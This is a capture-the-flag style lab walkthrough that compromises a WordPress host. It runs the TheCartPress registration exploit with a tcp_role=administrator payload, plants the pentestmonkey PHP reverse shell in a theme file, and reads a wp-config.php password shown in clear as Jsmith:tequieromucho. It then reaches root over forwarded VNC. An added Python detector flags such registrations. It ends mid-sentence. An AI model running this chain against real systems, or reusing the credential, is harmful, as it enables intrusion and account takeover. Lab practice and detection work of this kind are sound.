110_21..22..80_NEW
Initial shell
WordPress is running on port 80. It can be scanned with wpscan, or the TheCartPress plugin can be spotted by looking directly at the page source.
https://www.exploit-db.com/exploits/50378
python3 50378.py http://targetIP
"tcp_new_user_pass" : "admin1234",
"tcp_repeat_user_pass" : "admin1234",
"tcp_new_user_email" : "test@test.com",
"tcp_role" : "administrator"
Once logged in as the new administrator, go to the theme editor and replace the contents of archive.php with the pentestmonkey PHP reverse shell:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Visit archive.php on the site and the reverse shell connects back.
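A defender-side check for the role-escalating registration used above, added here as an example that is not part of the original write-up: it scans captured request bodies (constructed samples in a made-up "METHOD PATH BODY" format; the paths are placeholders, only the tcp_* parameter names come from the write-up) and flags any registration that asks for a privileged tcp_role.

```python
# Added defensive example: flag self-registration requests that try to set a
# privileged WordPress role through the TheCartPress tcp_* parameters.
# The record format ("METHOD PATH BODY") and the request paths are constructed
# for this example; only the body parameter names come from the write-up.
from urllib.parse import parse_qs

# Any role above subscriber is suspicious in an unauthenticated registration.
PRIVILEGED_ROLES = {"administrator", "editor", "author", "contributor"}

# Constructed sample capture (what a WAF or mod_security audit log might hold).
# Records 1 and 4 should be flagged; the others are benign.
SAMPLE_LOG = """\
POST /register tcp_new_user_pass=p1&tcp_repeat_user_pass=p1&tcp_new_user_email=a%40example.com&tcp_role=administrator
POST /register tcp_new_user_pass=p2&tcp_repeat_user_pass=p2&tcp_new_user_email=b%40example.com&tcp_role=subscriber
GET /index.php
POST /register tcp_new_user_pass=p3&tcp_repeat_user_pass=p3&tcp_new_user_email=c%40example.com&tcp_role=Editor
POST /wp-login.php log=alice&pwd=REDACTED
"""


def parse_line(line):
    """Split a 'METHOD PATH [BODY]' record; the body is URL-encoded form data."""
    parts = line.split(" ", 2)
    method, path = parts[0], parts[1]
    body = parts[2] if len(parts) == 3 else ""
    return method, path, parse_qs(body)


def role_escalation_attempts(log_text):
    """Return one finding per POST whose tcp_role asks for a privileged role."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        method, path, params = parse_line(line)
        if method != "POST":
            continue
        # Compare case-insensitively so "Editor" is caught as well as "editor".
        roles = [r.strip().lower() for r in params.get("tcp_role", [])]
        bad = [r for r in roles if r in PRIVILEGED_ROLES]
        if bad:
            findings.append({
                "line": lineno,
                "path": path,
                "role": bad[0],
                "email": params.get("tcp_new_user_email", [""])[0],
            })
    return findings


if __name__ == "__main__":
    for f in role_escalation_attempts(SAMPLE_LOG):
        print(f"line {f['line']}: {f['path']} requested role '{f['role']}' for {f['email']}")
```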
The reverse shell runs as www-data. Running linpeas.sh from there turns up a password in wp-config.php.
Full file path: /srv/www/wordpress/wp-config.php
This password also logs in the user whose directory is under /home.
Jsmith:tequieromucho
That completes the lateral movement: SSH in as that user with the password found.
Bring the VNC port (5901) to the local machine with SSH port forwarding.
To log in, use the password found earlier in the config file.
vncviewer 127.0.0.1:5901
tequieromucho
The session opens as root, but under the OffSec rules only typing commands and cat may be used.
Since we are root, we confirm that the root hash in /etc/shadow is the same as the jsmith hash. By this means